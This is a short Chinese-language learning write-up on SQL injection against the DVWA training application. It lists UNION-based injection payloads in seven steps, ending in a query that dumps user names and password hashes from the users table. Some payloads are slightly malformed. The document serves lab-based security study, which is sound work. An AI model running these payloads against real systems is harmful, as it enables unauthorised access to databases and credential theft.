基于DVWA的SQL注入学习
SQL注入简介
SQL注入攻击属于数据库安全攻击手段之一,可以通过数据库安全防护技术实现有效防护,数据库安全防护技术包括:数据库漏扫、数据库加密、数据库防火墙、数据脱敏、数据库安全审计系统。
Web程序三层架构
基于DVWA的SQL学习
在搭建好相应的环境后进入DVWA 首先先调整平台安全等级
如图所示就可以进行接下来的学习啦
猜解数据库
根据大佬博客进行复现的SQL注入学习
大佬博客连接:.
1.判断注入类型 1 and 1=1。。1 or 1=1 2.判断字段数 1 or 1=1 order by 2# 3.确定显示的字段顺序 1′ union select 111,222 # 4.获取当前数据库 1 union select 111,database()# 5.获取数据库中的表名 1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# 6.获取表中的字段名 1 union select group_concat(column_name) from information_schema.columns where table_name=guestbook,group_concat(column_name) from information_schema.columns where table_name=users# 7.下载数据 1 or 1=1 union select group_concat(user_id,first_name,last_name,user) ,group_concat(password) from users#
大佬很强,我好菜0.0
